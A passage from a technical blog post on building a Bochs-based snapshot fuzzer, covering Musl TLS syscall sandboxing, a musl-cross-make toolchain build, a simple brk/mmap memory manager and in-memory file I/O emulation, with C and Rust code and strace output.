So this function, __set_thread_area, uses an inline syscall instruction to call arch_prctl to directly manipulate the fs register. This made a lot of sense because, if the syscall instruction was indeed executed, we wouldn’t intercept this with our syscall sandboxing infrastructure because we never instrumented this; we’ve only instrumented what boils down to the syscall() function wrapper in Musl. So this would escape our sandbox and directly manipulate fs. Sure enough, I discovered that this function is called during TLS initialization in src/env/__init_tls.c:

int __init_tp(void *p)
{
	pthread_t td = p;
	td->self = td;
	int r = __set_thread_area(TP_ADJ(p));
	if (r < 0) return -1;
	if (!r) libc.can_do_threads = 1;
	td->detach_state = DT_JOINABLE;
	td->tid = __syscall(SYS_set_tid_address, &__thread_list_lock);
	td->locale = &libc.global_locale;
	td->robust_list.head = &td->robust_list.head;
	td->sysinfo = __sysinfo;
	td->next = td->prev = td;
	return 0;
}

So in this __init_tp function, we’re given a pointer and then we call the TP_ADJ macro to do some arithmetic on the pointer and pass that value to __set_thread_area so that fs is manipulated. Great, now how do we sandbox this? I wanted to avoid messing with the inline assembly in __set_thread_area itself, so I just changed the source so that Musl would instead just utilize the syscall() wrapper function which calls our instrumented syscall functions under the hood, like so:

#ifndef ARCH_SET_FS
#define ARCH_SET_FS 0x1002
#endif /* ARCH_SET_FS */

int __init_tp(void *p)
{
	pthread_t td = p;
	td->self = td;
	int r = syscall(SYS_arch_prctl, ARCH_SET_FS, TP_ADJ(p));
	//int r = __set_thread_area(TP_ADJ(p));

Now, we can intercept this syscall in Lucid and effectively do nothing really. As long as there are no other direct accesses to fs (and there might be still!), we should be fine here. I also adjusted the Musl code so that if we’re running under Lucid, we provide a TLS-area via the execution context by just creating a mock area of what Musl calls the builtin_tls:

static struct builtin_tls {
	char c;
	struct pthread pt;
	void *space[16];
} builtin_tls[1];

So now, when __init_tp is called, the pointer it is given points to our own TLS block of memory we’ve created in the execution context so that we now have access to things like errno in Lucid:

if (libc.tls_size > sizeof builtin_tls) {
#ifndef SYS_mmap2
#define SYS_mmap2 SYS_mmap
#endif
		__asm__ __volatile__ ("int3"); // Added by me just in case
		mem = (void *)__syscall(
			SYS_mmap2,
			0, libc.tls_size, PROT_READ|PROT_WRITE,
			MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
		/* -4095...-1 cast to void * will crash on dereference anyway,
		 * so don't bloat the init code checking for error codes and
		 * explicitly calling a_crash(). */
	} else {
		// Check to see if we're running under Lucid or not
		if (!g_lucid_ctx) { mem = builtin_tls; }
		else { mem = &g_lucid_ctx->tls; }
	}

	/* Failure to initialize thread pointer is always fatal. */
	if (__init_tp(__copy_tls(mem)) < 0)
		a_crash();

On the Lucid side, the TLS block in the execution context mirrors that layout:

#[repr(C)]
#[derive(Clone)]
pub struct Tls {
    padding0: [u8; 8], // char c
    padding1: [u8; 52], // Padding to offset of errno which is 52-bytes
    pub errno: i32,
    padding2: [u8; 144], // Additional padding to get to 200-bytes total
    padding3: [u8; 128], // 16 void * values
}

So now for example, if during a read syscall, we get passed a NULL buffer, we can return an error code and set errno appropriately from the syscall handler in Lucid:

            // Now we need to make sure the buffer passed to read isn't NULL
            let buf_p = a2 as *mut u8;
            if buf_p.is_null() {
                context.tls.errno = libc::EINVAL;
                return -1_i64 as u64;
            }

There may still be other accesses to fs and gs that I’m not currently sandboxing, but we haven’t reached that part of development yet.
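
To tie the TLS pieces together, here is a minimal sketch, assuming the `Tls` layout shown above and a hypothetical `handle_arch_prctl` function (the post does not show Lucid's real arch_prctl handler). It checks where errno lands in the mock TLS block and treats ARCH_SET_FS as a no-op that reports success:

```rust
// Values taken from the Musl assembly above: syscall 158 with code 0x1002
pub const SYS_ARCH_PRCTL: u64 = 158;
pub const ARCH_SET_FS: u64 = 0x1002;

// Same layout as the Tls struct in the post
#[repr(C)]
pub struct Tls {
    padding0: [u8; 8],
    padding1: [u8; 52],
    pub errno: i32,
    padding2: [u8; 144],
    padding3: [u8; 128],
}

impl Tls {
    // Zero-initialized TLS block
    pub fn new() -> Self {
        Tls {
            padding0: [0; 8],
            padding1: [0; 52],
            errno: 0,
            padding2: [0; 144],
            padding3: [0; 128],
        }
    }
}

// Byte offset of errno from the start of the TLS block
pub fn errno_offset(tls: &Tls) -> usize {
    &tls.errno as *const i32 as usize - tls as *const Tls as usize
}

// Hypothetical handler: accept ARCH_SET_FS without touching fs and report
// success; anything else is treated as unsupported
pub fn handle_arch_prctl(code: u64, _addr: u64) -> Result<u64, ()> {
    if code == ARCH_SET_FS { Ok(0) } else { Err(()) }
}
```

With this layout errno sits 60 bytes into the block (8 bytes for `char c` plus alignment, then 52 bytes into the 200-byte pthread area), and the whole block is 336 bytes.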

Building Bochs

I put off building and loading Bochs for a long time because I wanted to make sure I had the foundations of context-switching and syscall-sandboxing built. I also was worried that it would be difficult since getting vanilla Bochs built --static-pie was difficult for me initially. To complicate building Bochs in general, we need to build Bochs against our custom Musl. This means that we’ll need to have a compiler that we can tell to ignore whatever standard C library it normally uses and use our custom Musl libc instead. This proved quite tedious and difficult for me. Once I was successful, I came to realize that wasn’t enough. Bochs, being a C++ code base, also required access to standard C++ library functions. This simply could not work as I had done previously with the test program because I didn’t have a C++ library that we could use that had been built against our custom Musl.

Luckily, there is an awesome project called musl-cross-make, which aims to help people build their own Musl toolchains from scratch. This is perfect for what we need because we require a complete toolchain. We need to support the C++ standard library and it needs to be built with our custom Musl. So to do this, we use the GNU C++ Library, libstdc++, that is part of the gcc project.

musl-cross-make will pull down all of the constituent toolchain components and create a from-scratch toolchain that will utilize a Musl libc and a libstdc++ built against that Musl. Then all we have to do for our purposes is recompile that Musl libc with the custom patches that we make for Lucid, and then use the toolchain to compile Bochs as --static-pie. It really was as simple as:

git clone musl-cross-make
configure an x86_64 tool chain target
build the tool chain
go into its Musl directory, apply our Musl patches
configure Musl to build/install into the musl-cross-make output directory
re-build Musl libc
configure Bochs to use the new toolchain and set the --static-pie flag

This is the Bochs configuration file that I used to build Bochs:

#!/bin/sh

CC="/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-gcc"
CXX="/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-g++"
CFLAGS="-Wall --static-pie -fPIE"
CXXFLAGS="$CFLAGS"

export CC
export CXX
export CFLAGS
export CXXFLAGS

./configure --enable-sb16 \
                --enable-all-optimizations \
                --enable-long-phy-address \
                --enable-a20-pin \
                --enable-cpu-level=6 \
                --enable-x86-64 \
                --enable-vmx=2 \
                --enable-pci \
                --enable-usb \
                --enable-usb-ohci \
                --enable-usb-ehci \
                --enable-usb-xhci \
                --enable-busmouse \
                --enable-e1000 \
                --enable-show-ips \
                --enable-avx \
                --with-nogui

This was enough to get the Bochs binary I wanted to begin testing with. In the future we will likely need to change this configuration file, but for now this works. The repository should have more detailed build instructions and will also include an already-built Bochs binary.

Implementing a Simple MMU

Now that we are loading and executing Bochs and sandboxing it from syscalls, there are several new syscalls that we need to implement such as brk, mmap, and munmap. Our test program was very simple and we hadn’t come across these syscalls yet.

These three syscalls all manipulate memory in some way, so I decided that we needed to implement some sort of Memory-Manager (MMU). To keep things as simple as possible, I decided that, at least for now, we will not be worrying about freeing memory, re-using memory, or unmapping memory. We will simply pre-allocate a pool of memory for both brk calls to use and mmap calls to use, so two pre-allocated pools of memory. We can also just hang the MMU structure off of the execution context so that we always have access to it during syscalls and context-switches.

So far, Bochs really only cares to map memory in that is READ/WRITE, so that works in our favor in terms of simplicity. So to pre-allocate the memory pools, we just do a fairly large mmap call ourselves when we set up the MMU as part of the execution context initialization routine:

// Structure to track memory usage in Bochs
#[derive(Clone)]
pub struct Mmu {
    pub brk_base: usize,        // Base address of brk region, never changes
    pub brk_size: usize,        // Size of the program break region
    pub curr_brk: usize,        // The current program break
    
    pub mmap_base: usize,       // Base address of the `mmap` pool
    pub mmap_size: usize,       // Size of the `mmap` pool
    pub curr_mmap: usize,       // The current `mmap` page base
    pub next_mmap: usize,       // The next allocation base address
}

impl Mmu {
    pub fn new() -> Result<Self, LucidErr> {
        // We don't care where it's mapped
        let addr = std::ptr::null_mut::<libc::c_void>();

        // Straight-forward
        let length = (DEFAULT_BRK_SIZE + DEFAULT_MMAP_SIZE) as libc::size_t;

        // This is normal
        let prot = libc::PROT_WRITE | libc::PROT_READ;

        // This might change at some point?
        let flags = libc::MAP_ANONYMOUS | libc::MAP_PRIVATE;

        // No file backing
        let fd = -1 as libc::c_int;

        // No offset
        let offset = 0 as libc::off_t;

        // Try to `mmap` this block
        let result = unsafe {
            libc::mmap(
                addr,
                length,
                prot,
                flags,
                fd,
                offset
            )
        };

        if result == libc::MAP_FAILED {
            return Err(LucidErr::from("Failed to `mmap` memory for MMU"));
        }

        // Create MMU
        Ok(Mmu {
            brk_base: result as usize,
            brk_size: DEFAULT_BRK_SIZE,
            curr_brk: result as usize,
            mmap_base: result as usize + DEFAULT_BRK_SIZE,
            mmap_size: DEFAULT_MMAP_SIZE,
            curr_mmap: result as usize + DEFAULT_BRK_SIZE,
            next_mmap: result as usize + DEFAULT_BRK_SIZE,
        })
    }

Handling memory-management syscalls actually wasn’t too difficult. There were some gotchas early on, but we managed to get something working fairly quickly.

Handling `brk`

brk is a syscall used to increase the size of the data segment in your program. So a typical pattern you’ll see is that the program will call brk(0), which will return the current program break address, and then if the program wants 2 pages of extra memory, it will then call brk(base + 0x2000), and you can see that in the Bochs strace output:

[devbox:~/bochs/bochs-2.7]$ strace ./bochs
execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0)         = 289704
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000

So in our syscall handler, I have the following logic for brk:

// brk
        0xC => {
            // Try to update the program break
            if context.mmu.update_brk(a1).is_err() {
                fault!(contextp, Fault::InvalidBrk);
            }

            // Return the program break
            context.mmu.curr_brk as u64
        },

This is effectively a wrapper around the update_brk method we’ve implemented for Mmu, so let’s look at that:

// Logic for handling a `brk` syscall
    pub fn update_brk(&mut self, addr: usize) -> Result<(), ()> {
        // If addr is NULL, just return nothing to do
        if addr == 0 { return Ok(()); }

        // Check to see that the new address is in a valid range
        let limit = self.brk_base + self.brk_size;
        if !(self.curr_brk..limit).contains(&addr) { return Err(()); }

        // So we have a valid program break address, update the current break
        self.curr_brk = addr;

        Ok(())
    }

So if we get a NULL argument in a1, we have nothing to do: nothing in the current MMU state needs adjusting, and we simply return the current program break. If we get a non-NULL argument, we do a sanity check to make sure the requested address falls between the current program break and the end of our brk pool, which tells us the pool is large enough to accommodate the request. If it is, we adjust the current program break and return that to the caller.

Remember, this is so simple because we’ve already pre-allocated all of the memory, so we don’t need to actually do much here besides adjust what amounts to an offset indicating what memory is valid.
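
The bookkeeping can be exercised without mapping any memory at all. A minimal sketch, assuming a hypothetical `BrkPool` type that only tracks addresses (as `u64` here, where the post uses `usize`) and applies the same range check as update_brk:

```rust
// Hypothetical stand-in for the brk half of the MMU. No real memory is
// mapped; we only track addresses, which is all the bookkeeping needs.
pub struct BrkPool {
    pub base: u64, // Base address of the pool, never changes
    pub size: u64, // Size of the pool in bytes
    pub curr: u64, // Current program break
}

impl BrkPool {
    pub fn new(base: u64, size: u64) -> Self {
        BrkPool { base, size, curr: base }
    }

    // Returns the program break after the call, or Err if the requested
    // address is outside the range [curr, base + size)
    pub fn brk(&mut self, addr: u64) -> Result<u64, ()> {
        // brk(0) is just a query for the current break
        if addr == 0 {
            return Ok(self.curr);
        }

        // Same range check as update_brk in the post
        let limit = self.base + self.size;
        if !(self.curr..limit).contains(&addr) {
            return Err(());
        }

        self.curr = addr;
        Ok(self.curr)
    }
}
```

Two consequences of that range check are worth knowing: a request below the current break is rejected, so the break can never shrink, and the range is half-open, so a request for exactly `base + size` is rejected too.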

Handling `mmap` and `munmap`

mmap is a bit more involved, but still easy to track through. For mmap calls, there’s more state we need to track because there are essentially “allocations” taking place that we need to keep in mind. Most mmap calls will have a NULL argument for address because they don’t care where the memory mapping takes place in virtual memory. In that case, we default to our main method do_mmap that we’ve implemented for Mmu:

// If a1 is NULL, we just do a normal mmap
            if a1 == 0 {
                if context.mmu.do_mmap(a2, a3, a4, a5, a6).is_err() {
                    fault!(contextp, Fault::InvalidMmap);
                }

                // Successful regular mmap
                return context.mmu.curr_mmap as u64;
            }

// Logic for handling a `mmap` syscall with no fixed address support
    pub fn do_mmap(
        &mut self,
        len: usize,
        prot: usize,
        flags: usize,
        fd: usize,
        offset: usize
    ) -> Result<(), ()> {
        // Page-align the len
        let len = (len + PAGE_SIZE - 1) & !(PAGE_SIZE - 1);

        // Make sure we have capacity left to satisfy this request
        if len + self.next_mmap > self.mmap_base + self.mmap_size { 
            return Err(());
        }

        // Sanity-check that we don't have any weird `mmap` arguments
        if prot as i32 != libc::PROT_READ | libc::PROT_WRITE {
            return Err(())
        }

        if flags as i32 != libc::MAP_PRIVATE | libc::MAP_ANONYMOUS {
            return Err(())
        }

        if fd as i64 != -1 {
            return Err(())
        }

        if offset != 0 {
            return Err(())
        }

        // Set current to next, and set next to current + len
        self.curr_mmap = self.next_mmap;
        self.next_mmap = self.curr_mmap + len;

        // curr_mmap now represents the base of the new requested allocation
        Ok(())
    }

Very simply, we do some sanity checks to make sure we have enough capacity to satisfy the allocation in our mmap memory pool, we check to make sure the other arguments are what we’re anticipating, and then we simply update the current offset and the next offset. This way we know next time where to allocate from while also being able to return the current allocation base back to the caller.
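
The core of do_mmap is a bump allocator over page-aligned lengths. A minimal sketch, assuming a hypothetical `MmapPool` type that returns the allocation base directly instead of storing it in a `curr_mmap` field, and that skips the prot/flags/fd/offset checks:

```rust
pub const PAGE_SIZE: usize = 0x1000;

// Round a length up to the next multiple of the page size
pub fn page_align(len: usize) -> usize {
    (len + PAGE_SIZE - 1) & !(PAGE_SIZE - 1)
}

// Hypothetical bump allocator over a pre-allocated address range
pub struct MmapPool {
    pub base: usize, // Base address of the pool
    pub size: usize, // Size of the pool in bytes
    pub next: usize, // Where the next allocation will start
}

impl MmapPool {
    pub fn new(base: usize, size: usize) -> Self {
        MmapPool { base, size, next: base }
    }

    // Hand out the next page-aligned chunk, or None if the pool is exhausted
    pub fn alloc(&mut self, len: usize) -> Option<usize> {
        let len = page_align(len);
        let end = self.next.checked_add(len)?;
        if end > self.base + self.size {
            return None;
        }

        let curr = self.next;
        self.next = end;
        Some(curr)
    }
}
```

For example, the 4194324-byte request visible in the Bochs strace output rounds up to 4198400 bytes (0x401000), one page more than 4 MiB.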

There is also a case where mmap will be called with a non-NULL address and the MAP_FIXED flag, meaning that the address matters to the caller and the mapping should take place at the provided virtual address. Right now, this occurs early on in the Bochs process:

[devbox:~/bochs/bochs-2.7]$ strace ./bochs
execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0)         = 289704
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000

For this special case, there is really nothing for us to do since that address is in the brk pool. We already know about that memory, we’ve already created it, so this last mmap call you see above amounts to a NOP for us, there is nothing to do but return the address back to the caller.

At this time, we don’t support MAP_FIXED calls for non-brk pool memory.

For munmap, we also treat this operation as a NOP and return success to the user because we’re not concerned with freeing or re-using memory at this time.
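
The two NOP cases can be sketched as follows. This assumes hypothetical `handle_fixed_mmap` and `handle_munmap` functions (the post does not show Lucid's actual code for these paths), and uses the Linux x86_64 value of MAP_FIXED:

```rust
// Linux x86_64 value of the MAP_FIXED flag
pub const MAP_FIXED: u64 = 0x10;

// Hypothetical handler for mmap calls with a non-NULL address. A MAP_FIXED
// request that lies entirely inside the brk pool is a NOP that echoes the
// address back; anything else is unsupported.
pub fn handle_fixed_mmap(
    addr: u64,
    len: u64,
    flags: u64,
    brk_base: u64,
    brk_size: u64,
) -> Result<u64, ()> {
    // Only MAP_FIXED requests are expected on this path
    if flags & MAP_FIXED == 0 {
        return Err(());
    }

    // The whole requested range must fall inside the brk pool
    let end = addr.checked_add(len).ok_or(())?;
    if addr >= brk_base && end <= brk_base + brk_size {
        Ok(addr)
    } else {
        Err(())
    }
}

// Hypothetical munmap handler: nothing is ever freed, so always succeed
pub fn handle_munmap(_addr: u64, _len: u64) -> u64 {
    0
}
```

Checking the end of the range as well as the start keeps a fixed mapping from silently spilling past the pool.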

You can see that Bochs makes quite a few brk and mmap calls, and our fuzzer is now capable of handling them all via our MMU:

...
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bde000
mmap(NULL, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bda000
mmap(NULL, 4194324, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd06f7ff000
mmap(NULL, 73728, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbe000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbd000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbc000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
munmap(0x7fd071bbb000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bba000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb9000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb8000
brk(0x555555d7f000)                     = 0x555555d7f000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
munmap(0x7fd071bb5000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb0000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baf000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bad000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bab000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baa000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
munmap(0x7fd071ba5000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba3000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9e000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9d000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9b000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
munmap(0x7fd071b99000, 8192)            = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b97000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b96000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
munmap(0x7fd071b94000, 8192)            = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
...

File I/O

With the MMU out of the way, we needed a way to do file input and output. Bochs is trying to open its configuration file:

open(".bochsrc", O_RDONLY|O_LARGEFILE)  = 3
close(3)                                = 0
writev(2, [{iov_base="00000000000i[      ] ", iov_len=21}, {iov_base=NULL, iov_len=0}], 200000000000i[      ] ) = 21
writev(2, [{iov_base="reading configuration from .boch"..., iov_len=36}, {iov_base=NULL, iov_len=0}], 2reading configuration from .bochsrc
) = 36
open(".bochsrc", O_RDONLY|O_LARGEFILE)  = 3
read(3, "# You may now use double quotes "..., 1024) = 1024
read(3, "================================"..., 1024) = 1024
read(3, "ig_interface: win32config\n#confi"..., 1024) = 1024
read(3, "ace to AT&T's VNC viewer, cross "..., 1024) = 1024

The way I’ve approached this for now is to pre-read and store the contents of required files in memory when I initialize the Bochs execution context. This has some advantages, because I can imagine a future when we’re fuzzing something and Bochs needs to do file I/O on a disk image file or something else, and it’d be nice to just already have that file read into memory and waiting for usage. Emulating the file I/O syscalls then becomes very straightforward: we really only need to keep a little metadata and the file contents themselves:

#[derive(Clone)]
pub struct FileTable {
    files: Vec<File>,
}

impl FileTable {
    // We will attempt to open and read all of our required files ahead of time
    pub fn new() -> Result<Self, LucidErr> {
        // Retrieve .bochsrc
        let args: Vec<String> = std::env::args().collect();

        // Check to see if we have a "--bochsrc-path" argument
        if args.len() < 3 || !args.contains(&"--bochsrc-path".to_string()) {
            return Err(LucidErr::from("No `--bochsrc-path` argument"));
        }

        // Search for the value
        let mut bochsrc = None;
        for (i, arg) in args.iter().enumerate() {
            if arg == "--bochsrc-path" {
                if i >= args.len() - 1 {
                    return Err(
                        LucidErr::from("Invalid `--bochsrc-path` value"));
                }
            
                bochsrc = Some(args[i + 1].clone());
                break;
            }
        }

        if bochsrc.is_none() { return Err(
            LucidErr::from("No `--bochsrc-path` value provided")); }
        let bochsrc = bochsrc.unwrap();

        // Try to read the file
        let Ok(data) = read(&bochsrc) else { 
            return Err(LucidErr::from(
                &format!("Unable to read data BLEGH from '{}'", bochsrc)));
        };

        // Create a file now for .bochsrc
        let bochsrc_file = File {
            fd: 3,
            path: ".bochsrc".to_string(),
            contents: data.clone(),
            cursor: 0,
        };

        // Insert the file into the FileTable
        Ok(FileTable {
            files: vec![bochsrc_file],
        })
    }

    // Attempt to open a file
    pub fn open(&mut self, path: &str) -> Result<i32, ()> {
        // Try to find the requested path
        for file in self.files.iter() {
            if file.path == path {
                return Ok(file.fd);
            }
        }

        // We didn't find the file, this really should never happen?
        Err(())
    }

    // Look a file up by fd and then return a mutable reference to it
    pub fn get_file(&mut self, fd: i32) -> Option<&mut File> {
        self.files.iter_mut().find(|file| file.fd == fd)
    }
}

#[derive(Clone)]
pub struct File {
    pub fd: i32,            // The file-descriptor Bochs has for this file
    pub path: String,       // The file-path for this file
    pub contents: Vec<u8>,  // The actual file contents
    pub cursor: usize,      // The current cursor in the file
}
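
As an aside, the flag search in FileTable::new can be expressed more compactly with iterator helpers. A minimal sketch, assuming a hypothetical `find_arg_value` helper that is not part of Lucid:

```rust
// Hypothetical helper: return the value that follows `flag` in `args`, or
// None if the flag is missing or is the last argument
pub fn find_arg_value<'a>(args: &'a [String], flag: &str) -> Option<&'a str> {
    // Index of the flag itself
    let idx = args.iter().position(|arg| arg == flag)?;

    // The value is whatever comes next, if anything
    args.get(idx + 1).map(|s| s.as_str())
}
```

Called as `find_arg_value(&args, "--bochsrc-path")`, this folds the "flag missing" and "flag has no value" cases into a single `None`, so the caller gives up the two distinct error messages the original reports.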

So when Bochs asks to read a file and provides the fd, we just check the FileTable for the correct file and then read its contents from the File::contents buffer and then update the cursor struct member to keep track of where in the file our current offset is.

// read
        0x0 => {
            // Check to make sure we have the requested file-descriptor
            let Some(file) = context.files.get_file(a1 as i32) else {
                println!("Non-existent file fd: {}", a1);
                fault!(contextp, Fault::NoFile);
            };

            // Now we need to make sure the buffer passed to read isn't NULL
            let buf_p = a2 as *mut u8;
            if buf_p.is_null() {
                context.tls.errno = libc::EINVAL;
                return -1_i64 as u64;
            }

            // Adjust read size if necessary
            let length = std::cmp::min(a3, file.contents.len() - file.cursor);

            // Copy the contents over to the buffer
            unsafe { 
                std::ptr::copy(
                    file.contents.as_ptr().add(file.cursor),    // src
                    buf_p,                                      // dst
                    length);                                    // len
            }

            // Adjust the file cursor
            file.cursor += length;

            // Success
            length as u64
        },
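
The cursor logic is easy to check in isolation with safe Rust. A minimal sketch, assuming a hypothetical `MemFile` type that holds just the `contents` and `cursor` fields of the File struct and copies into a slice instead of a raw pointer:

```rust
// Hypothetical in-memory file: just the contents and a read cursor
pub struct MemFile {
    pub contents: Vec<u8>,
    pub cursor: usize,
}

impl MemFile {
    // Copy as many bytes as fit into `buf`, advance the cursor, and return
    // the number of bytes copied (0 at end-of-file)
    pub fn read(&mut self, buf: &mut [u8]) -> usize {
        // Everything from the cursor to the end of the file
        let remaining = &self.contents[self.cursor..];

        // Clamp the read to what is actually left
        let length = std::cmp::min(buf.len(), remaining.len());
        buf[..length].copy_from_slice(&remaining[..length]);

        self.cursor += length;
        length
    }
}
```

Reading an 11-byte file through an 8-byte buffer yields 8 bytes, then 3, then 0, which is the short-read and end-of-file behavior a caller of read expects.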

